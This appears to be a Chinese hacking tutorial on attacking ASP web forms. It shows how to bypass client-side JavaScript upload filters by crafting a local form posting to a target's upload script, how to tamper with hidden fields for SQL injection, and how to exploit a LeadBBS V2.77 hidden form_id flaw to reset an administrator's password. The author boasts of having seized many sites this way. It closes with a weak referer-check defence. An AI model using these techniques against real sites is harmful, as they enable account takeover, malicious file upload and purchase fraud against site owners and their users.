Web入侵安全检测之表单提交
在Web程序设计中,处理表单提交的数据是客户端向SERVER传递数据的主要方法,表单数据的提交方法有两种Post方法和Get方法,当使 用Post方法时,数据由标准的
输入设备读入,当使用Get方法时,数据由CGI变量QUERY_STRING传递给表单数据处理程 序,当Post方法一般不会在服务器上留下痕迹。具体的实现过程这里我就不多说,
有兴趣的朋友可以去翻阅其他资 料。不管是ASP程序还是PHP,CGI程序,表单提交的作用的大同小异的,所以这里仅以ASP为例。
一.利用表单本 地提交突破入侵限制
既然表单是客户端与服务端的重要数据传递方法之一,那么它的安全性就难免会出现问题。
1:上传非法文件。
某同学录的popwindowupload1.asp的客户端代码如下:
< HTML>
....
< Script language="javascript">
function mysubmit(theform)
{
if(theform.big.value=="")
{
alert("请点击浏览按钮,选择您要上传的jpg或gif文件!")
theform.big.focus;
return (false);
}
else
{
str= theform.big.value;
strs=str.toLowerCase();
lens=strs.length;
extname=strs.substring(lens-4,lens);
if(extname!=".jpg" && extname!=".gif")
{
alert(" 请选择jpg或gif文件!");
return (false);
}
}
return (true);
}
< /script>
.....
< input type="hidden" name="act" value="upload">
< input type="hidden" name="filepath" value="/alumni/class/classimage">
< input type="submit" name="Submit2" value="开始上传">
....
< /HTML>
很明显,这个上传文件在客户端利用SCRIPT限制了上传类型,虽然用SCRIPT可以减轻ASP程序 的负载,但象大部分好的方面一样也有它坏的一面,如果其只是在客户端做限制,并在服务端限制上传类型或禁止外部提交,那么它并不能阻止我们上传程序禁止上 传的ASP,CER,PHP等文件,只要我们在本地构造一个表单也能能轻松的上传这些文件。
构造的表单主要代码如下:
.............
< form name="mainForm" enctype="multipart/form-data" action="http://www.***
w.com/alumni/class/pic/upfile.asp?userid2=" method=post">
< tr>
< td width="74" align="right" height="26">标题:
< td width="399">十二少
< /tr>
< tr>
< td width="74" align="right" height="26">照片说明:
< td width="399">十二少's照片
< /td>
< /tr>
< tr>
< td width="74" align="right" height="26">图片路径:
< td width="399">
< input type="file" name="big">
< /td>
< /tr>
< tr align="center">
< td colspan="2" height="26">
< input type="hidden" name="act" value="upload">
< input type="hidden" name="filepath" value="/alumni/class/classimage">
< input type="submit" name="Submit2" value="开始上传">
< br>
< /td>
< /tr>
< tr align="center">
< td colspan="2" height="26" class="di">只支持jpg,gif文件,图片大小在
150k< /font>以内,上传时请耐心等待!
< /tr>
< /form>
....
只要将前面查看得到的代码中的 验证文件类型的SCRIPT删掉,然后再修改ACTION后的URL保存为HTML文件即可
2:突破表格注入限制
这 个和前面一差不多就不再多说了(呵呵,其实是找不到实例拉)
另外字符输入的长度限制也差不多,只要你看得懂这些HTML语言。
二.HIDDEN隐藏字段缺陷
终于说到重点了。
1:还是SQL注入问题。
目 前SQL注入工击仍是入侵中的一大热点,不过随着时间的推移,一般的大型网站程序都已经将明显的
注入点打好补丁拉,但是一些隐藏的比较 深的注入点却还是有不少的,除非将它所有的代码都翻新一片。
明显的注入点如:.asp?id=*,输入框等都已经过滤了,但这就能彻底 的杜绝黑客的入侵吗?回答当然是NO
这就要提到本文的重点HIDDEN隐藏字段拉。
图1是某网游官方站点的帐号激活 界面,查看源码,搜索"HIDDEN"字符串
< form action="index_game.asp" method="post" name="form1" target="_blank" >
...
< td height="25" align="center">
< input type="submit" name="Submit" value="提交">
...
< /form>
如图2,看到了吗那个:
只要它没有在客户端做任何限制,
这就是一个注入点拉,将"user_name"的 值"norfolk"改为想要注入的代码,然后和前面的一样将"ACTION"
的改为相应的URL,保存为HTML文 件~~~~~~~~~
不过,它的安全还不错,提交后返回错误提示窗口,很显然它在服务端禁止了外部提交。
2:非法修改其他用户密码。
典型的代表是leadbbs V2.77的那个密码修改漏洞:任何注册用户都可以修改管理员密码,从而入侵服务器,
进而 拿下主机。
登陆后修改密码,查看源码,其主要漏洞代码如下:
.......
< form action=usermodify.asp method=post name=form1 >
< tr>
< td align=middle height=25>
< p>*用户名称:
< td height=25>
< p>norfolk
< tr>
< td align=middle height=25>
< p>*你的密码:
< td height=25>
< input class=fminpt name=submitflag type=hidden value=52norflk>
< input class=fminpt name=form_id type=hidden value=265>
........
其中我的 from_id的值为265,在管理员例表中查看管理员ID,然后将它替换265,再将ACTION的URL相应的修改一下
保存为 HTML文件再提交就可以将管理员的密码改成52norfolk。
这个漏洞早在2003.12月就已经公布,这里在拿出来只是为了说明 一下这个HIDDEN隐藏字段的危害。不过我发现目前
还是有不少程序可以任意修改其他用户的密码,至于方法如出一辙,(偶用这个漏洞拿 下过不少站点的ADMIN):-_-
3:任意修改价格以达到低价甚至不花一分钱网上购物。
早在几年前国内国外的一些 大型网上购物网站就已经出现过类似的漏洞。 这些网站的后台程序的验证机制并不健全
以至可以在外部提交数据,于是便出现了低价甚至不花 一分钱购买商品的事件,导致这些网站造成重大的经济损失,
由此观之,网络安全是马虎不得的,即使一丁 点而问题,造成的损失也是不可估量的。希望之后的程序员在编写程序时能
够尽量细心。这里我就不再将它的利用过程写出来了,反正它们的利 用过程都基本相似。
最后给大家介绍老外写的一个不错的检测WEB应用程序安全性的工具,一下是安全焦点的介绍:
Achilles是一个设计用来测试web应用程序安全性的工具。它是一个代理服务器,在一
个HTTP会话中扮演着"中间人"(man-in-the-middle)的角色。一个典型的HTTP代理服
务器将在客户浏览器和 web服务器间转发数据包,但Achilles却载取发向任一方的HTTP会
话数据,并且在转发数据前可以让用户修改这些数据.
相信在WEB入侵方面可以为您提供不少的帮助,如果有可能下次再专门写篇文章介绍它吧,这里我就不多说了,有兴趣的
朋友可以自己下载 研究研究,它的下载地址:http://www.xfocus.net/tools/200403/achilles-0-27.zip
后记:
到这里还是说一下解决方法吧。
首先当然是禁止外部提交,这里有种不错的方法,大家可以参考参考:
< %
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if mid(server_v1,8,len(server_v2))<>server_v2 then
% >
你想入侵我也不要这么麻烦嘛,直接打电话告诉我,我给你开WEBSHELL,呵呵
< %
Response.Redirect "Fuck-Hacker.asp"
end if
% >
但这不能彻底杜绝黑客对传递的DIDDEN数据的修改,前面那个ACHILLES就能修改,所以在服务端还要有健全的验证机制。
- 最新评论